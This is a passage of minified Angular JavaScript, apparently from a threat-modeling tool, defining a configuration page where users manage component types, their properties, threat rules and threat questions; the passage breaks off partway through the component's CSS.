be(e),Me(V(4).selectedProperty.Type=n)}),s(24,"\n "),ne(25,aft,2,2,"mat-option",30),s(26,"\n "),u(),s(27,"\n "),u(),s(28,"\n "),it(29,"br"),s(30,"\n "),m(31,"mat-form-field",7),s(32,"\n "),m(33,"mat-label"),s(34),oe(35,"translate"),u(),s(36,"\n "),m(37,"input",31),he("ngModelChange",function(n){return be(e),Me(V(4).selectedProperty.Tooltip=n)}),u(),s(38,"\n "),u(),s(39,"\n "),s(40,"\n "),u(),s(41,"\n "),Mt()}if(2&t){const e=V(4);g(7),ke(re(8,12,"general.PropertyName")),g(3),at("matTooltip",e.selectedProperty.DisplayName),F("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedProperty.DisplayName),g(2),F("ngIf",e.selectedProperty.DisplayName),g(8),ke(re(21,14,"general.Type")),g(3),at("matTooltip",e.selectedProperty.Type),F("value",e.selectedProperty.Type),g(2),F("ngForOf",e.GetPropertyTypes()),g(9),ke(re(35,16,"general.Tooltip")),g(3),F("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedProperty.Tooltip)}}function oft(t,a){if(1&t){const e=Ye();s(0,"\n "),m(1,"div",14),s(2,"\n "),m(3,"div",15),s(4,"\n "),m(5,"mat-list",16),he("cdkDropListDropped",function(n){be(e);const r=V(3);return Me(r.drop(n,r.selectedComponentType.Properties))}),s(6,"\n "),m(7,"div",17),s(8),oe(9,"translate"),m(10,"button",18),he("click",function(){return be(e),Me(V(3).AddProperty())}),oe(11,"translate"),m(12,"mat-icon"),s(13,"add"),u()()(),s(14,"\n "),ne(15,tft,18,14,"mat-list-item",19),s(16,"\n "),u(),s(17,"\n "),u(),s(18,"\n "),m(19,"div",20),s(20,"\n "),ne(21,nft,42,18,"ng-container",6),s(22,"\n "),u(),s(23,"\n "),u(),s(24,"\n ")}if(2&t){const e=V(3);g(5),Ct("prop-list-light",!e.theme.IsDarkMode)("prop-list-dark",e.theme.IsDarkMode),g(3),za("",e.selectedComponentType.Name," ",re(9,9,"general.Properties")," "),g(2),at("matTooltip",re(11,11,"general.Add")),g(5),F("ngForOf",e.selectedComponentType.Properties),g(6),F("ngIf",null==e.selectedComponentType.Properties?null:e.selectedComponentType.Properties.includes(e.selectedProperty))}}function rft(t,a){1&t&&(m(0,"div",23),s(1),oe(2,"translate"),oe(3,"translate"),u()),2&t&&(g(1),za("",re(2,2,"properties.Restrictions"),": ",re(3,4,"pages.config.noRestrictions"),""))}function sft(t,a){if(1&t&&(m(0,"div",23),s(1),oe(2,"translate"),u()),2&t){const e=V().$implicit,i=V(4);g(1),za("",re(2,2,"properties.Restrictions"),": ",i.GetComponentRestrictionsCount(e),"")}}function cft(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",21),he("click",function(){const r=be(e).$implicit;return Me(V(4).selectedThreatRule=r)})("contextmenu",function(n){const c=be(e).$implicit;return Me(V(4).OpenContextMenu(n,c))}),s(1,"\n "),m(2,"mat-icon",22),s(3,"arrow_right"),u(),s(4,"\n "),m(5,"div",23),s(6),u(),s(7,"\n "),ne(8,rft,4,6,"div",35),s(9,"\n "),ne(10,sft,3,4,"div",35),s(11,"\n "),m(12,"button",24),he("click",function(){const r=be(e).$implicit;return Me(V(4).DeleteThreat(r))}),oe(13,"translate"),m(14,"mat-icon"),s(15,"delete"),u()(),s(16,"\n "),u()}if(2&t){const e=a.$implicit,i=V(4);Ct("highlight-light",i.selectedThreatRule===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedThreatRule===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),g(6),ke(e.Name),g(2),F("ngIf",0==i.GetComponentRestrictionsCount(e)),g(2),F("ngIf",i.GetComponentRestrictionsCount(e)>0),g(2),at("matTooltip",re(13,9,"general.Delete"))}}function lft(t,a){if(1&t){const e=Ye();s(0,"\n "),m(1,"div",14),s(2,"\n "),m(3,"div",15),s(4,"\n "),m(5,"mat-list",16),he("cdkDropListDropped",function(n){be(e);const r=V(3);return Me(r.dropThreat(n,r.typeThreats))}),s(6,"\n "),m(7,"div",17),s(8),oe(9,"translate"),m(10,"button",18),he("click",function(){return be(e),Me(V(3).AddThreat())}),oe(11,"translate"),m(12,"mat-icon"),s(13,"add"),u()()(),s(14,"\n "),ne(15,cft,17,11,"mat-list-item",19),s(16,"\n "),u(),s(17,"\n "),u(),s(18,"\n "),m(19,"div",20),s(20,"\n "),it(21,"app-threat-rule",34),s(22,"\n "),u(),s(23,"\n "),u(),s(24,"\n ")}if(2&t){const e=V(3);g(5),Ct("prop-list-light",!e.theme.IsDarkMode)("prop-list-dark",e.theme.IsDarkMode),g(3),za("",e.selectedComponentType.Name," ",re(9,12,"general.Threats")," "),g(2),at("matTooltip",re(11,14,"general.Add")),g(5),F("ngForOf",e.typeThreats),g(6),F("node",e.selectedNode)("threatRule",e.selectedThreatRule)("canEdit",!0)("canEditName",!0)}}function dft(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",21),he("click",function(){const r=be(e).$implicit;return Me(V(4).selectedQuestion=r)})("contextmenu",function(n){const c=be(e).$implicit;return Me(V(4).OpenContextMenu(n,c))}),s(1,"\n "),m(2,"mat-icon",22),s(3,"arrow_right"),u(),s(4,"\n "),m(5,"div",23),s(6),u(),s(7,"\n "),m(8,"div",23),s(9),oe(10,"translate"),u(),s(11,"\n "),m(12,"button",38),he("click",function(){const r=be(e).$implicit;return Me(V(4).DuplicateQuestion(r))}),oe(13,"translate"),m(14,"mat-icon"),s(15,"content_copy"),u()(),s(16,"\n "),m(17,"button",24),he("click",function(){const r=be(e).$implicit;return Me(V(4).DeleteQuestion(r))}),oe(18,"translate"),m(19,"mat-icon"),s(20,"delete"),u()(),s(21,"\n "),u()}if(2&t){const e=a.$implicit,i=V(4);Ct("highlight-light",i.selectedQuestion===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedQuestion===e&&i.theme.IsDarkMode),at("matTooltip",null==e?null:e.Name),g(6),ke(e.Name),g(3),ke(re(10,9,i.GetOptionTypeName(e.OptionType))),g(3),at("matTooltip",re(13,11,"general.Duplicate")),g(5),at("matTooltip",re(18,13,"general.Delete"))}}function mft(t,a){if(1&t&&(bt(0),s(1,"\n "),m(2,"div",39),s(3,"\n "),it(4,"app-threat-question",40),s(5,"\n "),u(),s(6,"\n "),Mt()),2&t){const e=V(4);g(4),F("threatQuestion",e.selectedQuestion)}}function uft(t,a){if(1&t){const e=Ye();s(0,"\n "),m(1,"div",14),s(2,"\n "),m(3,"div",15),s(4,"\n "),m(5,"mat-list",16),he("cdkDropListDropped",function(n){be(e);const r=V(3);return Me(r.dropQuestion(n,r.GetQuestions()))}),s(6,"\n "),m(7,"div",17),s(8),oe(9,"translate"),m(10,"button",36),he("click",function(){return be(e),Me(V(3).AddQuestion())}),oe(11,"translate"),m(12,"mat-icon",37),s(13,"add"),u()()(),s(14,"\n "),ne(15,dft,22,15,"mat-list-item",19),s(16,"\n "),u(),s(17,"\n "),u(),s(18,"\n "),m(19,"div",20),s(20,"\n "),ne(21,mft,7,1,"ng-container",6),s(22,"\n "),u(),s(23,"\n "),u(),s(24,"\n ")}if(2&t){const e=V(3);g(5),Ct("prop-list-light",!e.theme.IsDarkMode)("prop-list-dark",e.theme.IsDarkMode),g(3),ke(re(9,8,"general.ThreatQuestion")),g(2),at("matTooltip",re(11,10,"general.Add")),g(5),F("ngForOf",e.GetQuestions()),g(6),F("ngIf",e.selectedQuestion)}}function hft(t,a){if(1&t){const e=Ye();s(0,"\n "),m(1,"div",41),s(2,"\n "),m(3,"mat-form-field",26),s(4,"\n "),m(5,"mat-label"),s(6),oe(7,"translate"),u(),s(8,"\n "),m(9,"input",27),he("ngModelChange",function(n){return be(e),Me(V(3).newThreat.name=n)}),u(),s(10,"\n "),u(),s(11,"\n "),it(12,"br"),s(13,"\n "),m(14,"mat-form-field",26),s(15,"\n "),m(16,"mat-label"),s(17),oe(18,"translate"),u(),s(19,"\n "),m(20,"input",27),he("ngModelChange",function(n){return be(e),Me(V(3).newThreat.property=n)}),u(),s(21,"\n "),u(),s(22,"\n "),m(23,"mat-checkbox",42),he("ngModelChange",function(n){return be(e),Me(V(3).newThreat.threatGen=n)}),s(24,"Threat generated when Property == "),u(),s(25,"\n "),it(26,"br"),s(27,"\n "),m(28,"mat-form-field",7),s(29,"\n "),m(30,"mat-label"),s(31),oe(32,"translate"),u(),s(33,"\n "),m(34,"input",27),he("ngModelChange",function(n){return be(e),Me(V(3).newThreat.question=n)}),u(),s(35,"\n "),u(),s(36,"\n "),m(37,"button",43),he("click",function(){return be(e),Me(V(3).AddNewThreat())}),s(38),oe(39,"translate"),u(),s(40,"\n "),m(41,"mat-checkbox",44),he("ngModelChange",function(n){return be(e),Me(V(3).newThreat.yesResult=n)}),s(42,"Answering the question with Yes sets the property to"),u(),s(43,"\n "),u(),s(44,"\n ")}if(2&t){const e=V(3);g(6),ke(re(7,18,"general.Threat")),g(3),at("matTooltip",e.newThreat.name),F("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.newThreat.name),g(8),ke(re(18,20,"general.Property")),g(3),at("matTooltip",e.newThreat.property),F("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.newThreat.property),g(3),F("disabled",""==e.newThreat.property)("ngModel",e.newThreat.threatGen),g(8),ke(re(32,22,"properties.Question")),g(3),at("matTooltip",e.newThreat.question),F("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.newThreat.question),g(3),F("disabled",""==e.newThreat.name||""==e.newThreat.question),g(1),ke(re(39,24,"general.Add")),g(3),F("disabled",""==e.newThreat.property)("ngModel",e.newThreat.yesResult)}}function fft(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"mat-form-field",7),s(3,"\n "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"textarea",8),he("ngModelChange",function(n){return be(e),Me(V(2).selectedComponentType.Description=n)}),u(),s(9,"\n "),u(),s(10,"\n "),m(11,"mat-checkbox",9),he("ngModelChange",function(n){return be(e),Me(V(2).selectedComponentType.IsActive=n)}),s(12),oe(13,"translate"),u(),s(14,"\n "),m(15,"mat-checkbox",10),he("ngModelChange",function(n){return be(e),Me(V(2).selectedComponentType.IsThirdParty=n)}),s(16),oe(17,"translate"),u(),s(18,"\n \n "),m(19,"mat-tab-group",11),he("selectedIndexChange",function(n){return be(e),Me(V(2).SetSelectedTabIndex(n))}),s(20,"\n "),m(21,"mat-tab",12),oe(22,"translate"),s(23,"\n "),ne(24,oft,25,13,"ng-template",13),s(25,"\n "),u(),s(26,"\n "),m(27,"mat-tab",12),oe(28,"translate"),s(29,"\n "),ne(30,lft,25,16,"ng-template",13),s(31,"\n "),u(),s(32,"\n "),m(33,"mat-tab",12),oe(34,"translate"),s(35,"\n "),ne(36,uft,25,12,"ng-template",13),s(37,"\n "),u(),s(38,"\n "),m(39,"mat-tab",12),oe(40,"translate"),s(41,"\n "),ne(42,hft,45,26,"ng-template",13),s(43,"\n "),u(),s(44,"\n "),u(),s(45,"\n "),Mt()}if(2&t){const e=V(2);let i;g(5),ke(re(6,15,"properties.Description")),g(3),F("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedComponentType.Description),g(3),F("ngModel",e.selectedComponentType.IsActive),g(1),ke(re(13,17,"properties.IsActive")),g(3),F("ngModel",e.selectedComponentType.IsThirdParty),g(1),ke(re(17,19,"properties.IsThirdParty")),g(3),F("selectedIndex",e.GetSelectedTabIndex()),g(2),Kc("label","",re(22,21,"general.Properties")," (",null==e.selectedComponentType||null==e.selectedComponentType.Properties?null:e.selectedComponentType.Properties.length,")"),g(6),Kc("label","",re(28,23,"general.Threats")," (",null==e.typeThreats?null:e.typeThreats.length,")"),g(6),Kc("label","",re(34,25,"properties.Questions")," (",null==(i=e.GetQuestions())?null:i.length,")"),g(6),at("label",re(40,27,"general.Wizard"))}}function pft(t,a){if(1&t&&(m(0,"div",5),s(1,"\n "),m(2,"h2"),s(3),u(),s(4,"\n "),ne(5,fft,46,29,"ng-container",6),s(6,"\n"),u()),2&t){const e=V();g(3),ke(e.selectedNode.name()),g(2),F("ngIf",e.selectedComponentType)}}function _ft(t,a){if(1&t&&(m(0,"span",47),s(1),oe(2,"translate"),u()),2&t){const e=V(2).item;g(1),ke(re(2,1,e.DisplayName))}}function gft(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),ne(2,_ft,3,3,"span",45),s(3," \n "),m(4,"button",46),he("click",function(){be(e);const n=V().item;return Me(V().OnMoveUpProperty(n))}),s(5,"\n "),m(6,"mat-icon"),s(7,"arrow_upward"),u(),s(8,"\n "),m(9,"span"),s(10),oe(11,"translate"),u(),s(12,"\n "),u(),s(13,"\n "),m(14,"button",46),he("click",function(){be(e);const n=V().item;return Me(V().OnMoveDownProperty(n))}),s(15,"\n "),m(16,"mat-icon"),s(17,"arrow_downward"),u(),s(18,"\n "),m(19,"span"),s(20),oe(21,"translate"),u(),s(22,"\n "),u(),s(23,"\n "),Mt()}if(2&t){const e=V().item;g(2),F("ngIf",e),g(8),ke(re(11,3,"nav-tree.moveUp")),g(10),ke(re(21,5,"nav-tree.moveDown"))}}function Cft(t,a){if(1&t&&(m(0,"span",47),s(1),u()),2&t){const e=V(2).item;g(1),ke(e.Name)}}function yft(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),ne(2,Cft,2,1,"span",45),s(3," \n "),m(4,"button",46),he("click",function(){be(e);const n=V().item;return Me(V().OnMoveUpThreatRule(n))}),s(5,"\n "),m(6,"mat-icon"),s(7,"arrow_upward"),u(),s(8,"\n "),m(9,"span"),s(10),oe(11,"translate"),u(),s(12,"\n "),u(),s(13,"\n "),m(14,"button",46),he("click",function(){be(e);const n=V().item;return Me(V().OnMoveDownThreatRule(n))}),s(15,"\n "),m(16,"mat-icon"),s(17,"arrow_downward"),u(),s(18,"\n "),m(19,"span"),s(20),oe(21,"translate"),u(),s(22,"\n "),u(),s(23,"\n "),Mt()}if(2&t){const e=V().item;g(2),F("ngIf",e),g(8),ke(re(11,3,"nav-tree.moveUp")),g(10),ke(re(21,5,"nav-tree.moveDown"))}}function bft(t,a){if(1&t&&(m(0,"span",47),s(1),u()),2&t){const e=V(2).item;g(1),ke(e.Name)}}function Mft(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),ne(2,bft,2,1,"span",45),s(3," \n "),m(4,"button",46),he("click",function(){be(e);const n=V().item;return Me(V().OnMoveUpQuestion(n))}),s(5,"\n "),m(6,"mat-icon"),s(7,"arrow_upward"),u(),s(8,"\n "),m(9,"span"),s(10),oe(11,"translate"),u(),s(12,"\n "),u(),s(13,"\n "),m(14,"button",46),he("click",function(){be(e);const n=V().item;return Me(V().OnMoveDownQuestion(n))}),s(15,"\n "),m(16,"mat-icon"),s(17,"arrow_downward"),u(),s(18,"\n "),m(19,"span"),s(20),oe(21,"translate"),u(),s(22,"\n "),u(),s(23,"\n "),Mt()}if(2&t){const e=V().item;g(2),F("ngIf",e),g(8),ke(re(11,3,"nav-tree.moveUp")),g(10),ke(re(21,5,"nav-tree.moveDown"))}}function vft(t,a){if(1&t&&(s(0,"\n "),ne(1,gft,24,7,"ng-container",6),s(2,"\n "),ne(3,yft,24,7,"ng-container",6),s(4,"\n "),ne(5,Mft,24,7,"ng-container",6),s(6,"\n ")),2&t){const e=a.item,i=V();g(1),F("ngIf",i.IsProperty(e)),g(2),F("ngIf",i.IsThreatRule(e)),g(2),F("ngIf",i.IsThreatQuestion(e))}}let Aft=(()=>{class t extends xa{constructor(e,i,n,r,c){super(),this.theme=e,this.dataService=i,this.dialog=n,this.translate=r,this.locStorage=c,this.newThreat={name:"",question:"",property:"",threatGen:!1,yesResult:!0},this.menuTopLeftPosition={x:"0",y:"0"},i.ConfigChanged.subscribe(d=>this.createNodes())}get selectedNode(){return this._selectedNode}set selectedNode(e){this._selectedNode=e,this.selectedQuestion=null,this.selectedProperty=null,this.selectedThreatRule=null}get selectedComponentType(){var e;return null===(e=this.selectedNode)||void 0===e?void 0:e.data}get typeThreats(){return this.selectedComponentType?this.dataService.Config.GetThreatRules().filter(e=>{var i;return(null===(i=e.ComponentRestriction)||void 0===i?void 0:i.componentTypeID)==this.selectedComponentType.ID}):[]}get selectedQuestion(){return this._selectedQuestion}set selectedQuestion(e){this._selectedQuestion=e}ngOnInit(){setTimeout(()=>{this.createNodes()},100)}OpenContextMenu(e,i){e.preventDefault(),this.menuTopLeftPosition.x=e.clientX+"px",this.menuTopLeftPosition.y=e.clientY+"px",this.matMenuTrigger.menuData={item:i},this.matMenuTrigger.openMenu()}IsProperty(e){return"DisplayName"in e&&"ID"in e}IsThreatRule(e){return e instanceof Fp}IsThreatQuestion(e){return e instanceof iM}OnMoveUpProperty(e){let i=this.selectedComponentType.Properties;if(0!=i.findIndex(n=>n.ID==e.ID)){let n=i.findIndex(r=>r.ID==e.ID);i.splice(n,0,i.splice(n-1,1)[0])}}OnMoveDownProperty(e){let i=this.selectedComponentType.Properties;if(i.findIndex(n=>n.ID==e.ID)!=i.length-1){let n=i.findIndex(r=>r.ID==e.ID);i.splice(n,0,i.splice(n+1,1)[0])}}OnMoveUpThreatRule(e){let i=this.dataService.Config.GetThreatRules(),n=this.typeThreats,r=n.findIndex(c=>c.ID==e.ID);if(0!=r){const c=i.findIndex(T=>T.ID==e.ID),d=i.findIndex(T=>T.ID==n[r-1].ID);this.dataService.Config.MoveItemInThreatRules(c,d)}}OnMoveDownThreatRule(e){let i=this.dataService.Config.GetThreatRules(),n=this.typeThreats,r=n.findIndex(c=>c.ID==e.ID);if(r!=n.length-1){const c=i.findIndex(T=>T.ID==e.ID),d=i.findIndex(T=>T.ID==n[r+1].ID);this.dataService.Config.MoveItemInThreatRules(c,d)}}OnMoveUpQuestion(e){let i=this.dataService.Config.GetThreatQuestions(),n=this.GetQuestions(),r=n.findIndex(c=>c.ID==e.ID);if(0!=r){const c=i.findIndex(T=>T.ID==e.ID),d=i.findIndex(T=>T.ID==n[r-1].ID);this.dataService.Config.MoveItemInThreatQuestions(c,d)}}OnMoveDownQuestion(e){let i=this.dataService.Config.GetThreatQuestions(),n=this.GetQuestions(),r=n.findIndex(c=>c.ID==e.ID);if(r!=n.length-1){const c=i.findIndex(T=>T.ID==e.ID),d=i.findIndex(T=>T.ID==n[r+1].ID);this.dataService.Config.MoveItemInThreatQuestions(c,d)}}AddProperty(){let e=[];e.push(...this.selectedComponentType.Properties.map(n=>n.DisplayName));let i=Gi.FindUniqueName("New Property",e);this.selectedComponentType.Properties.push({DisplayName:i,ID:Fo(),Tooltip:"",HasGetter:!1,Editable:!0,Type:Ii.CheckBox}),this.selectedProperty=this.selectedComponentType.Properties[this.selectedComponentType.Properties.length-1]}DeleteProperty(e){let i=this.selectedComponentType.Properties.indexOf(e);i>=0&&this.selectedComponentType.Properties.splice(i,1)}GetElementPropertyValue(e){let i=e.DefaultValue;return e.Type==Ii.ProtocolSelect?"[ ]":e.Type==Ii.LowMediumHighSelect?An.ToString(i):i}GetPropertyTypes(){return yG.GetMappableTypeNames()}AddThreat(){let e=this.dataService.Config.CreateThreatRule(this.dataService.Config.ComponentThreatRuleGroups,on.Component);e.ComponentRestriction.componentTypeID=this.selectedComponentType.ID,e.Name=Gi.FindUniqueName(this.selectedComponentType.Name,this.dataService.Config.GetThreatRules().map(i=>i.Name)),this.selectedThreatRule=e}DeleteThreat(e){this.dataService.Config.DeleteThreatRule(e),e==this.selectedThreatRule&&(this.selectedThreatRule=null)}GetComponentRestrictionsCount(e){var i;let n=0;return!(null===(i=e.ComponentRestriction)||void 0===i)&&i.DetailRestrictions&&e.ComponentRestriction.DetailRestrictions.forEach(r=>{(r.RestType==ya.Property&&r.PropertyRest||r.RestType==ya.PhysicalElement&&r.PhyElementRest)&&(n+=1)}),n}AddQuestion(){let e=this.dataService.Config.CreateThreatQuestion();return e.ComponentType=this.selectedComponentType,this.selectedQuestion=e,e}DuplicateQuestion(e){let i=this.AddQuestion();i.CopyFrom(e.Data),i.Name+="-Copy"}DeleteQuestion(e){this.dialog.OpenDeleteObjectDialog(e).subscribe(i=>{i&&(this.dataService.Config.DeleteThreatQuestion(e),this.selectedQuestion=null)})}AddNewThreat(){var e;this.AddThreat(),this.selectedThreatRule.Name=this.newThreat.name,this.AddQuestion(),this.selectedQuestion.Name=this.newThreat.name,this.selectedQuestion.Question=this.newThreat.question,(null===(e=this.newThreat.property)||void 0===e?void 0:e.length)>0&&(this.AddProperty(),this.selectedProperty.DisplayName=this.newThreat.property,this.selectedProperty.Tooltip=this.newThreat.question,this.selectedThreatRule.ComponentRestriction.DetailRestrictions.push({IsOR:!0,Layer:0,RestType:ya.Property,PropertyRest:{ID:this.selectedProperty.ID,ComparisonType:cc.Equals,Value:this.newThreat.threatGen}}),this.selectedQuestion.Property=this.selectedProperty,this.newThreat.yesResult||(this.selectedQuestion.ChangesPerOption["general.Yes"].Value=!1,this.selectedQuestion.ChangesPerOption["general.No"].Value=!0)),this.newThreat={name:"",property:"",question:"",threatGen:!1,yesResult:!0}}GetQuestions(){return this.dataService.Config.GetThreatQuestions().filter(e=>e.ComponentType==this.selectedComponentType)}drop(e,i){Qs(i,e.previousIndex,e.currentIndex)}dropThreat(e,i){const n=this.dataService.Config.GetThreatRules().indexOf(i[e.previousIndex]),r=this.dataService.Config.GetThreatRules().indexOf(i[e.currentIndex]);this.dataService.Config.MoveItemInThreatRules(n,r)}dropQuestion(e,i){const n=this.dataService.Config.GetThreatQuestions().indexOf(i[e.previousIndex]),r=this.dataService.Config.GetThreatQuestions().indexOf(i[e.currentIndex]);this.dataService.Config.MoveItemInThreatQuestions(n,r)}GetOptionTypeName(e){return Pl.ToString(e)}GetSelectedTabIndex(){let e=this.locStorage.Get(si.PAGE_CONFIG_COMPONENTS_TAB_INDEX);return null!=e?e:0}SetSelectedTabIndex(e){this.locStorage.Set(si.PAGE_CONFIG_COMPONENTS_TAB_INDEX,e)}createNodes(){const e=this.Nodes;this.Nodes=[];let i=(c,d,T,k)=>{let q={name:()=>c.Name,canSelect:!0,data:c,canRename:!0,onRename:Y=>{c.Name=Y},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(c).subscribe(Y=>{Y&&(this.dataService.Config.DeleteMyComponentType(c),this.selectedNode==q&&(this.selectedNode=null),this.createNodes())})},canMoveUpDown:!0,onMoveUp:()=>{let Y=d.Data.myComponentTypeIDs;if(0!=Y.findIndex(te=>te==c.ID)){let te=Y.findIndex(pe=>pe==c.ID);Y.splice(te,0,Y.splice(te-1,1)[0]),T.children.splice(te,0,T.children.splice(te-1,1)[0])}},onMoveDown:()=>{let Y=d.Data.myComponentTypeIDs;if(Y.findIndex(te=>te==c.ID)!=Y.length-1){let te=Y.findIndex(pe=>pe==c.ID);Y.splice(te,0,Y.splice(te+1,1)[0]),T.children.splice(te,0,T.children.splice(te+1,1)[0])}},canMoveToGroup:!0,onMoveToGroups:()=>k.children.filter(Y=>Y!=T),onMoveToGroup:Y=>{let te="myComponentTypeIDs";d.Data[te].splice(d.Data[te].indexOf(c.ID),1),Y.data.Data[te].push(c.ID),this.createNodes()}};return q},n=(c,d)=>{let T={name:()=>c.Name,canSelect:!1,data:c,canAdd:!0,onAdd:()=>{let k=this.dataService.Config.CreateMyComponentType(c);k.ComponentTypeID=this.componentType,k.IsActive=!0,this.createNodes(),this.selectedNode=this.FindNodeOfObject(k),this.selectedNode.isRenaming=!0},canRename:!0,onRename:k=>{c.Name=k},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(c).subscribe(k=>{k&&(this.dataService.Config.DeleteMyComponentTypeGroup(c),this.selectedNode==T&&(this.selectedNode=null),this.createNodes())})},children:[],canMoveUpDown:!0,onMoveUp:()=>{let k=this.dataService.Config.GetMyComponentTypeGroups(c.ComponentTypeID);if(0!=k.findIndex(q=>q.ID==c.ID)){let q=k.findIndex(Y=>Y.ID==c.ID);k.splice(q,0,k.splice(q-1,1)[0]),d.children.splice(q,0,d.children.splice(q-1,1)[0])}},onMoveDown:()=>{let k=this.dataService.Config.GetMyComponentTypeGroups(c.ComponentTypeID);if(k.findIndex(q=>q.ID==c.ID)!=k.length-1){let q=k.findIndex(Y=>Y.ID==c.ID);k.splice(q,0,k.splice(q+1,1)[0]),d.children.splice(q,0,d.children.splice(q+1,1)[0])}}};return T},r={name:()=>this.translate.instant("pages.config."+(this.componentType==zr.Software?"Software":"Process")+"Components"),canSelect:!1,icon:this.componentType==zr.Software?"code":"policy",canAdd:!0,hasMenu:!0,onAdd:()=>{let c=this.dataService.Config.CreateMyComponentTypeGroup(this.componentType);this.createNodes(),this.selectedNode=this.FindNodeOfObject(c),this.selectedNode.isRenaming=!0},children:[]};this.dataService.Config&&this.dataService.Config.GetMyComponentTypeGroups(this.componentType).forEach(c=>{let d=n(c,r);c.Types.forEach(T=>d.children.push(i(T,c,d,r))),r.children.push(d)}),this.Nodes.push(r),xa.TransferExpandedState(e,this.Nodes),this.nodeTreeChanged.emit(this.Nodes)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Wn),Ee(Sn),Ee(_r))},t.\u0275cmp=Wt({type:t,selectors:[["app-components"]],viewQuery:function(e,i){if(1&e&&Mi(eft,5),2&e){let n;Vt(n=Bt())&&(i.matMenuTrigger=n.first)}},inputs:{selectedNode:"selectedNode",componentType:"componentType"},features:[ci],decls:11,vars:6,consts:[["style","margin-left: 10px; margin-right: 10px;",4,"ngIf"],[2,"visibility","hidden","position","fixed",3,"matMenuTriggerFor"],["ctxMenu","matMenuTrigger"],["rightMenu","matMenu"],["matMenuContent",""],[2,"margin-left","10px","margin-right","10px"],[4,"ngIf"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],["color","primary",3,"ngModel","ngModelChange"],["color","primary",2,"margin-left","15px",3,"ngModel","ngModelChange"],[3,"selectedIndex","selectedIndexChange"],[3,"label"],["matTabContent",""],[1,"row"],[1,"column1"],["cdkDropList","",1,"prop-list","reorder-list",3,"cdkDropListDropped"],["mat-subheader",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matTooltip","click"],["cdkDrag","","matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click","contextmenu",4,"ngFor","ngForOf"],[1,"column2"],["cdkDrag","","matTooltipShowDelay","1000",3,"matTooltip","click","contextmenu"],["mat-list-icon",""],["mat-line",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matTooltip","click"],[2,"margin","10px"],["appearance","fill",1,"property-form-field"],["matInput","","type","text","matTooltipShowDelay","1000",3,"spellcheck","ngModel","matTooltip","ngModelChange"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["matTooltipShowDelay","1000",3,"value","matTooltip","valueChange"],[3,"value",4,"ngFor","ngForOf"],["matInput","","type","text",3,"spellcheck","ngModel","ngModelChange"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],[3,"value"],[3,"node","threatRule","canEdit","canEditName"],["mat-line","",4,"ngIf"],["mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],[2,"margin-left","15px"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto","margin-right","0px",3,"matTooltip","click"],[2,"margin","10px 0 0 10px"],[3,"threatQuestion"],[2,"margin-top","10px"],["color","primary","labelPosition","before",2,"margin-left","10px",3,"disabled","ngModel","ngModelChange"],["mat-raised-button","",2,"float","right","margin-right","5px",3,"disabled","click"],["color","primary","labelPosition","before",3,"disabled","ngModel","ngModelChange"],["style","margin-left: 20px; margin-right: 20px;",4,"ngIf"],["mat-menu-item","",3,"click"],[2,"margin-left","20px","margin-right","20px"]],template:function(e,i){if(1&e&&(ne(0,pft,7,2,"div",0),s(1,"\n"),it(2,"div",1,2),s(4," \n"),m(5,"mat-menu",null,3),s(7," \n "),ne(8,vft,7,3,"ng-template",4),s(9," \n"),u(),s(10," ")),2&e){const n=Ti(6);F("ngIf",i.selectedNode),g(2),ri("left",i.menuTopLeftPosition.x)("top",i.menuTopLeftPosition.y),F("matMenuTriggerFor",n)}},dependencies:[Zi,Ri,an,Ta,Ea,Sd,kd,oa,br,da,nn,un,jr,Nr,yr,qh,Mu,Uh,Go,Xa,ts,is,Or,Lr,rc,Xo,qo,po,el,Pa,qp,TZ,Xi],styles:['.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%] .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%] .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%] .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%] .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 